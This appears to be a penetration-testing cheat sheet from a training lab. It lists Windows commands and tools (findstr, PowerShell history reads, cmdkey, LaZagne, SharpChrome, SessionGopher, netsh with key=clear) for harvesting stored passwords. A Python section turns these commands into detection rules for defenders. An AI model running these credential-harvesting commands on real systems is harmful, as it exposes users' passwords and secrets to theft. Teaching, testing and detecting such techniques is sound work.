Credential Theft

Searching for Passwords in Files

  1. Search for files containing the phrase "password"

    findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
  2. Search for passwords in Chrome dictionary files

    gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
  3. Confirm PowerShell history save path

    (Get-PSReadLineOption).HistorySavePath
  4. Read PowerShell history file

    gc (Get-PSReadLineOption).HistorySavePath
  5. Decrypt stored PowerShell credentials

    $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
  6. Search file contents for "password", listing only the names of matching files

    cd c:\Users\htb-student\Documents & findstr /SI /M "password" *.xml *.ini *.txt
  7. Search file contents for "password" recursively

    findstr /si password *.xml *.ini *.txt *.config
  8. Search for specific strings in all files

    findstr /spin "password" *.*
  9. Search file contents with PowerShell

    select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password
  10. Search for files by name pattern or extension

    dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
  11. Search for configuration files recursively

    where /R C:\ *.config
  12. Search for credential-related files using PowerShell

    Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Credential Dumping & Enumeration

  1. List saved credentials on Windows

    cmdkey /list
  2. Retrieve saved Chrome credentials using SharpChrome

    .\SharpChrome.exe logins /unprotect
  3. View LaZagne help menu

    .\lazagne.exe -h
  4. Run all LaZagne modules

    .\lazagne.exe all
  5. Run SessionGopher to extract session information

    Invoke-SessionGopher -Target WINLPE-SRV01

Wireless Network Credential Extraction

  1. View saved wireless networks

    netsh wlan show profile
  2. Retrieve saved wireless passwords

    netsh wlan show profile ilfreight_corp key=clear
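
Detection side of the commands listed on this page, as an added example that is not part of the original notes: a triage pass over command-line text exported from process-creation or PowerShell script-block logging. The event fields (host, user, cmdline), the rule names, the threshold and the sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Rules derived from the commands on this page; the rule names are this example's own.
RULES = {
    "findstr_password": re.compile(r"\bfindstr(\.exe)?\b.*password", re.I),
    "select_string_password": re.compile(r"\bselect-string\b.*password", re.I),
    "ps_history_read": re.compile(
        r"\b(gc|cat|type|get-content)\b.*(historysavepath|consolehost_history\.txt)", re.I),
    "cmdkey_list": re.compile(r"\bcmdkey(\.exe)?\s+/list\b", re.I),
    "wlan_key_clear": re.compile(
        r"\bnetsh(\.exe)?\s+wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear\b", re.I),
    "credential_tool": re.compile(
        r"(lazagne|sharpchrome)(\.exe)?\b|\binvoke-sessiongopher\b", re.I),
}

def match_rules(cmdline):
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def triage(events, threshold=2):
    """Group hits by (host, user). Alert when the number of distinct rules
    reaches the threshold, or when a known credential tool ran at all.
    Single hits such as 'cmdkey /list' are common admin activity and stay quiet."""
    hits = defaultdict(set)
    for ev in events:
        for name in match_rules(ev["cmdline"]):
            hits[(ev["host"], ev["user"])].add(name)
    return {key: sorted(names) for key, names in hits.items()
            if len(names) >= threshold or "credential_tool" in names}

# Constructed sample events (not real logs); hosts, users and SSID are made up.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "alice", "cmdline": 'findstr /SIM /C:"password" *.txt *.ini *.cfg'},
    {"host": "WS01", "user": "alice", "cmdline": "netsh wlan show profile corp_wifi key=clear"},
    {"host": "WS01", "user": "alice", "cmdline": "cmdkey /list"},
    {"host": "WS02", "user": "bob", "cmdline": "cmdkey /list"},
    {"host": "WS02", "user": "bob", "cmdline": "netsh wlan show profile"},
    {"host": "WS03", "user": "svc", "cmdline": r".\lazagne.exe all"},
]

if __name__ == "__main__":
    for (host, user), rules in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"ALERT {host}\\{user}: {', '.join(rules)}")
```

String matching on tool names is easy to evade by renaming a binary, so treat these rules as a baseline and pair them with file-access auditing on the history file and credential stores.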
